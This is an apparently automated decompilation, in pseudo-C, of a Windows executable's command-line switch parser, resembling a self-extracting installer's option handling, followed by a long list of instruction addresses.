                                                                                                                                                                                                                                              				CHAR* _t201;
                                                                                                                                                                                                                                              				void* _t205;
                                                                                                                                                                                                                                              				void* _t206;
                                                                                                                                                                                                                                              				int _t209;
                                                                                                                                                                                                                                              				void* _t210;
                                                                                                                                                                                                                                              				void* _t212;
                                                                                                                                                                                                                                              				void* _t213;
                                                                                                                                                                                                                                              				CHAR* _t218;
                                                                                                                                                                                                                                              				intOrPtr* _t219;
                                                                                                                                                                                                                                              				intOrPtr* _t220;
                                                                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                                                                              				signed int _t223;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t173 = __ecx;
                                                                                                                                                                                                                                              				_t61 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                                                                              				_t209 = 1;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					while(_t209 != 0) {
                                                                                                                                                                                                                                              						_t67 =  *_t173;
                                                                                                                                                                                                                                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                              							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v272 = _t173;
                                                                                                                                                                                                                                              						if(_t67 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t69 = _v272;
                                                                                                                                                                                                                                              							_t177 = 0;
                                                                                                                                                                                                                                              							_t213 = 0;
                                                                                                                                                                                                                                              							_t163 = 0;
                                                                                                                                                                                                                                              							_t202 = 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								if(_t213 != 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t69 =  *_t69;
                                                                                                                                                                                                                                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t69 = _v272;
                                                                                                                                                                                                                                              										L21:
                                                                                                                                                                                                                                              										_t155 =  *_t69;
                                                                                                                                                                                                                                              										if(_t155 != 0x22) {
                                                                                                                                                                                                                                              											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              												goto L106;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                              												_t177 = _t177 + 1;
                                                                                                                                                                                                                                              												_t202 = _t202 + 1;
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                              												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              													L106:
                                                                                                                                                                                                                                              													_t63 = 0;
                                                                                                                                                                                                                                              													L125:
                                                                                                                                                                                                                                              													_pop(_t210);
                                                                                                                                                                                                                                              													_pop(_t212);
                                                                                                                                                                                                                                              													_pop(_t162);
                                                                                                                                                                                                                                              													return E00976CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                              													_t177 = _t177 + 1;
                                                                                                                                                                                                                                              													_t202 = _t202 + 1;
                                                                                                                                                                                                                                              													_t157 = 2;
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												if(_t213 != 0) {
                                                                                                                                                                                                                                              													_t163 = 1;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t213 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L131;
                                                                                                                                                                                                                                              								L30:
                                                                                                                                                                                                                                              								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                              								_t69 = _v272;
                                                                                                                                                                                                                                              							} while ( *_t69 != 0);
                                                                                                                                                                                                                                              							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                              								E00976E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                              								asm("int3");
                                                                                                                                                                                                                                              								_push(_t221);
                                                                                                                                                                                                                                              								_t222 = _t223;
                                                                                                                                                                                                                                              								_t71 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                              									0x4f0 = 2;
                                                                                                                                                                                                                                              									_t75 = E0097597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E009744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                              									 *0x979124 = E00976285();
                                                                                                                                                                                                                                              									_t75 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								return E00976CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                              								if(_t213 == 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										goto L34;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L40;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										_t79 = _v268;
                                                                                                                                                                                                                                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                              											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                              											if(_t83 == 0) {
                                                                                                                                                                                                                                              												_t202 = 0x521;
                                                                                                                                                                                                                                              												E009744B9(0, 0x521, 0x971140, 0, 0x40, 0);
                                                                                                                                                                                                                                              												_t85 =  *0x978588; // 0x0
                                                                                                                                                                                                                                              												if(_t85 != 0) {
                                                                                                                                                                                                                                              													CloseHandle(_t85);
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												ExitProcess(0);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t87 = _t83 - 4;
                                                                                                                                                                                                                                              											if(_t87 == 0) {
                                                                                                                                                                                                                                              												if(_v266 != 0) {
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t50;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t88 =  *_t183;
                                                                                                                                                                                                                                              															_t183 = _t183 + 1;
                                                                                                                                                                                                                                              														} while (_t88 != 0);
                                                                                                                                                                                                                                              														if(_t183 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t205 = 0x5b;
                                                                                                                                                                                                                                              															if(E0097667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                              																L115:
                                                                                                                                                                                                                                              																_t206 = 0x5d;
                                                                                                                                                                                                                                              																if(E0097667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                              																	L117:
                                                                                                                                                                                                                                              																	_t202 =  &_v276;
                                                                                                                                                                                                                                              																	_v276 = _t167;
                                                                                                                                                                                                                                              																	if(E00975C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t202 = 0x104;
                                                                                                                                                                                                                                              																		E00971680(0x978c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t202 = 0x5b;
                                                                                                                                                                                                                                              																	if(E0097667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		goto L117;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t202 = 0x5d;
                                                                                                                                                                                                                                              																if(E0097667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L115;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *0x978a24 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L50;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t100 = _t87 - 1;
                                                                                                                                                                                                                                              												if(_t100 == 0) {
                                                                                                                                                                                                                                              													L98:
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                              														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                              														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t38;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t101 =  *_t192;
                                                                                                                                                                                                                                              															_t192 = _t192 + 1;
                                                                                                                                                                                                                                              														} while (_t101 != 0);
                                                                                                                                                                                                                                              														if(_t192 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t202 =  &_v276;
                                                                                                                                                                                                                                              															_v276 = _t170;
                                                                                                                                                                                                                                              															if(E00975C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                              																goto L49;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                              																_t218 = 0x978b3e;
                                                                                                                                                                                                                                              																_t105 = _v276;
                                                                                                                                                                                                                                              																if(_t104 != 0x54) {
                                                                                                                                                                                                                                              																	_t218 = 0x978a3a;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																E00971680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                              																_t202 = 0x104;
                                                                                                                                                                                                                                              																E0097658A(_t218, 0x104, 0x971140);
                                                                                                                                                                                                                                              																if(E009731E0(_t218) != 0) {
                                                                                                                                                                                                                                              																	goto L50;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L106;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                              													if(_t111 == 0) {
                                                                                                                                                                                                                                              														if(_v266 != 0) {
                                                                                                                                                                                                                                              															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																goto L49;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t199 = _v265;
                                                                                                                                                                                                                                              																if(_t199 != 0) {
                                                                                                                                                                                                                                              																	_t219 =  &_v265;
                                                                                                                                                                                                                                              																	do {
                                                                                                                                                                                                                                              																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                              																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                              																		if(_t115 == 0) {
                                                                                                                                                                                                                                              																			 *0x978a2c = 1;
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			_t200 = 2;
                                                                                                                                                                                                                                              																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                              																			if(_t119 == 0) {
                                                                                                                                                                                                                                              																				 *0x978a30 = 1;
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                              																					 *0x978a34 = 1;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t209 = 0;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																		_t118 =  *_t219;
                                                                                                                                                                                                                                              																		_t199 = _t118;
                                                                                                                                                                                                                                              																	} while (_t118 != 0);
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															 *0x978a2c = 1;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														goto L50;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t127 = _t111 - 3;
                                                                                                                                                                                                                                              														if(_t127 == 0) {
                                                                                                                                                                                                                                              															if(_v266 != 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                              																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                              																		goto L76;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                              																			goto L83;
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                              																				goto L76;
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				goto L49;
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																L76:
                                                                                                                                                                                                                                              																_push(2);
                                                                                                                                                                                                                                              																_pop(1);
                                                                                                                                                                                                                                              																L83:
                                                                                                                                                                                                                                              																 *0x978a38 = 1;
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              															goto L50;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t132 = _t127 - 1;
                                                                                                                                                                                                                                              															if(_t132 == 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0) {
                                                                                                                                                                                                                                              																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                              																			goto L49;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t201 = _v265;
                                                                                                                                                                                                                                              																		 *0x979a2c = 1;
                                                                                                                                                                                                                                              																		if(_t201 != 0) {
                                                                                                                                                                                                                                              																			_t220 =  &_v265;
                                                                                                                                                                                                                                              																			do {
                                                                                                                                                                                                                                              																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                              																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                              																				if(_t142 == 0) {
                                                                                                                                                                                                                                              																					_t143 = 2;
                                                                                                                                                                                                                                              																					 *0x979a2c =  *0x979a2c | _t143;
                                                                                                                                                                                                                                              																					goto L70;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                              																					if(_t145 == 0) {
                                                                                                                                                                                                                                              																						 *0x978d48 =  *0x978d48 | 0x00000040;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                              																						if(_t146 == 0) {
                                                                                                                                                                                                                                              																							 *0x979a2c =  *0x979a2c & 0xfffffffd;
                                                                                                                                                                                                                                              																							goto L70;
                                                                                                                                                                                                                                              																						} else {
                                                                                                                                                                                                                                              																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                              																							if(_t147 == 0) {
                                                                                                                                                                                                                                              																								 *0x979a2c =  *0x979a2c & 0xfffffffe;
                                                                                                                                                                                                                                              																								goto L70;
                                                                                                                                                                                                                                              																							} else {
                                                                                                                                                                                                                                              																								_t149 = _t147;
                                                                                                                                                                                                                                              																								if(_t149 == 0) {
                                                                                                                                                                                                                                              																									 *0x978d48 =  *0x978d48 | 0x00000080;
                                                                                                                                                                                                                                              																								} else {
                                                                                                                                                                                                                                              																									if(_t149 == 3) {
                                                                                                                                                                                                                                              																										 *0x979a2c =  *0x979a2c | 0x00000004;
                                                                                                                                                                                                                                              																										L70:
                                                                                                                                                                                                                                              																										 *0x978a28 = 1;
                                                                                                                                                                                                                                              																									} else {
                                                                                                                                                                                                                                              																										_t209 = 0;
                                                                                                                                                                                                                                              																									}
                                                                                                                                                                                                                                              																								}
                                                                                                                                                                                                                                              																							}
                                                                                                                                                                                                                                              																						}
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t144 =  *_t220;
                                                                                                                                                                                                                                              																				_t201 = _t144;
                                                                                                                                                                                                                                              																			} while (_t144 != 0);
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	 *0x979a2c = 3;
                                                                                                                                                                                                                                              																	 *0x978a28 = 1;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																goto L50;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																if(_t132 == 0) {
                                                                                                                                                                                                                                              																	goto L98;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	L49:
                                                                                                                                                                                                                                              																	_t209 = 0;
                                                                                                                                                                                                                                              																	L50:
                                                                                                                                                                                                                                              																	_t173 = _v272;
                                                                                                                                                                                                                                              																	if( *_t173 != 0) {
                                                                                                                                                                                                                                              																		goto L2;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		break;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L106;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										L34:
                                                                                                                                                                                                                                              										_t209 = 0;
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L131;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *0x978a2c != 0 &&  *0x978b3e == 0) {
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0x979a3c, 0x978b3e, 0x104) == 0) {
                                                                                                                                                                                                                                              							_t209 = 0;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t202 = 0x5c;
                                                                                                                                                                                                                                              							 *((char*)(E009766C8(0x978b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t63 = _t209;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L131:
                                                                                                                                                                                                                                              			}


































































                                                                                                                                                                                                                                              0x00975c9e
                                                                                                                                                                                                                                              0x00975ca9
                                                                                                                                                                                                                                              0x00975cb0
                                                                                                                                                                                                                                              0x00975cb3
                                                                                                                                                                                                                                              0x00975cb6
                                                                                                                                                                                                                                              0x00975cb7
                                                                                                                                                                                                                                              0x00975cb8
                                                                                                                                                                                                                                              0x00975cbd
                                                                                                                                                                                                                                              0x00976204
                                                                                                                                                                                                                                              0x00975ccb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975ccb
                                                                                                                                                                                                                                              0x00975cd3
                                                                                                                                                                                                                                              0x00975cd7
                                                                                                                                                                                                                                              0x00975cf4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975cf4
                                                                                                                                                                                                                                              0x00975cf8
                                                                                                                                                                                                                                              0x00975d00
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d06
                                                                                                                                                                                                                                              0x00975d06
                                                                                                                                                                                                                                              0x00975d0e
                                                                                                                                                                                                                                              0x00975d10
                                                                                                                                                                                                                                              0x00975d12
                                                                                                                                                                                                                                              0x00975d14
                                                                                                                                                                                                                                              0x00975d15
                                                                                                                                                                                                                                              0x00975d17
                                                                                                                                                                                                                                              0x00975d49
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d19
                                                                                                                                                                                                                                              0x00975d19
                                                                                                                                                                                                                                              0x00975d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d3f
                                                                                                                                                                                                                                              0x00975d3f
                                                                                                                                                                                                                                              0x00975d4b
                                                                                                                                                                                                                                              0x00975d4b
                                                                                                                                                                                                                                              0x00975d4f
                                                                                                                                                                                                                                              0x00975d8d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d93
                                                                                                                                                                                                                                              0x00975d93
                                                                                                                                                                                                                                              0x00975d9a
                                                                                                                                                                                                                                              0x00975d9d
                                                                                                                                                                                                                                              0x00975d9e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d9e
                                                                                                                                                                                                                                              0x00975d51
                                                                                                                                                                                                                                              0x00975d5b
                                                                                                                                                                                                                                              0x00975d72
                                                                                                                                                                                                                                              0x009760fb
                                                                                                                                                                                                                                              0x009760fb
                                                                                                                                                                                                                                              0x00976207
                                                                                                                                                                                                                                              0x0097620a
                                                                                                                                                                                                                                              0x0097620b
                                                                                                                                                                                                                                              0x0097620e
                                                                                                                                                                                                                                              0x00976217
                                                                                                                                                                                                                                              0x00975d78
                                                                                                                                                                                                                                              0x00975d78
                                                                                                                                                                                                                                              0x00975d80
                                                                                                                                                                                                                                              0x00975d83
                                                                                                                                                                                                                                              0x00975d84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d84
                                                                                                                                                                                                                                              0x00975d5d
                                                                                                                                                                                                                                              0x00975d5f
                                                                                                                                                                                                                                              0x00975d62
                                                                                                                                                                                                                                              0x00975d68
                                                                                                                                                                                                                                              0x00975d64
                                                                                                                                                                                                                                              0x00975d64
                                                                                                                                                                                                                                              0x00975d64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d62
                                                                                                                                                                                                                                              0x00975d5b
                                                                                                                                                                                                                                              0x00975d4f
                                                                                                                                                                                                                                              0x00975d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d9f
                                                                                                                                                                                                                                              0x00975d9f
                                                                                                                                                                                                                                              0x00975da5
                                                                                                                                                                                                                                              0x00975dab
                                                                                                                                                                                                                                              0x00975dba
                                                                                                                                                                                                                                              0x00976218
                                                                                                                                                                                                                                              0x0097621d
                                                                                                                                                                                                                                              0x00976220
                                                                                                                                                                                                                                              0x00976221
                                                                                                                                                                                                                                              0x00976229
                                                                                                                                                                                                                                              0x00976230
                                                                                                                                                                                                                                              0x00976247
                                                                                                                                                                                                                                              0x0097626a
                                                                                                                                                                                                                                              0x00976272
                                                                                                                                                                                                                                              0x00976249
                                                                                                                                                                                                                                              0x00976255
                                                                                                                                                                                                                                              0x0097625f
                                                                                                                                                                                                                                              0x00976264
                                                                                                                                                                                                                                              0x00976264
                                                                                                                                                                                                                                              0x00976284
                                                                                                                                                                                                                                              0x00975dc0
                                                                                                                                                                                                                                              0x00975dc0
                                                                                                                                                                                                                                              0x00975dca
                                                                                                                                                                                                                                              0x00975e22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975dcc
                                                                                                                                                                                                                                              0x00975dce
                                                                                                                                                                                                                                              0x00975e24
                                                                                                                                                                                                                                              0x00975e24
                                                                                                                                                                                                                                              0x00975e2c
                                                                                                                                                                                                                                              0x00975e47
                                                                                                                                                                                                                                              0x00975e4a
                                                                                                                                                                                                                                              0x009761d2
                                                                                                                                                                                                                                              0x009761e2
                                                                                                                                                                                                                                              0x009761e7
                                                                                                                                                                                                                                              0x009761ee
                                                                                                                                                                                                                                              0x009761f1
                                                                                                                                                                                                                                              0x009761f1
                                                                                                                                                                                                                                              0x009761f8
                                                                                                                                                                                                                                              0x009761f8
                                                                                                                                                                                                                                              0x00975e50
                                                                                                                                                                                                                                              0x00975e53
                                                                                                                                                                                                                                              0x00976109
                                                                                                                                                                                                                                              0x0097611f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976125
                                                                                                                                                                                                                                              0x00976137
                                                                                                                                                                                                                                              0x0097613a
                                                                                                                                                                                                                                              0x0097613c
                                                                                                                                                                                                                                              0x0097613e
                                                                                                                                                                                                                                              0x0097613e
                                                                                                                                                                                                                                              0x00976141
                                                                                                                                                                                                                                              0x00976141
                                                                                                                                                                                                                                              0x00976143
                                                                                                                                                                                                                                              0x00976144
                                                                                                                                                                                                                                              0x0097614a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976150
                                                                                                                                                                                                                                              0x00976152
                                                                                                                                                                                                                                              0x0097615c
                                                                                                                                                                                                                                              0x00976170
                                                                                                                                                                                                                                              0x00976172
                                                                                                                                                                                                                                              0x0097617c
                                                                                                                                                                                                                                              0x00976190
                                                                                                                                                                                                                                              0x00976190
                                                                                                                                                                                                                                              0x00976196
                                                                                                                                                                                                                                              0x009761a5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009761ab
                                                                                                                                                                                                                                              0x009761b9
                                                                                                                                                                                                                                              0x009761c6
                                                                                                                                                                                                                                              0x009761c6
                                                                                                                                                                                                                                              0x0097617e
                                                                                                                                                                                                                                              0x00976180
                                                                                                                                                                                                                                              0x0097618a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097618a
                                                                                                                                                                                                                                              0x0097615e
                                                                                                                                                                                                                                              0x00976160
                                                                                                                                                                                                                                              0x0097616a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097616a
                                                                                                                                                                                                                                              0x0097615c
                                                                                                                                                                                                                                              0x0097614a
                                                                                                                                                                                                                                              0x0097610b
                                                                                                                                                                                                                                              0x0097610e
                                                                                                                                                                                                                                              0x0097610e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e59
                                                                                                                                                                                                                                              0x00975e59
                                                                                                                                                                                                                                              0x00975e5c
                                                                                                                                                                                                                                              0x0097604f
                                                                                                                                                                                                                                              0x00976056
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097605c
                                                                                                                                                                                                                                              0x0097606e
                                                                                                                                                                                                                                              0x00976071
                                                                                                                                                                                                                                              0x00976073
                                                                                                                                                                                                                                              0x00976075
                                                                                                                                                                                                                                              0x00976075
                                                                                                                                                                                                                                              0x00976078
                                                                                                                                                                                                                                              0x00976078
                                                                                                                                                                                                                                              0x0097607a
                                                                                                                                                                                                                                              0x0097607b
                                                                                                                                                                                                                                              0x00976081
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976087
                                                                                                                                                                                                                                              0x00976087
                                                                                                                                                                                                                                              0x0097608d
                                                                                                                                                                                                                                              0x0097609c
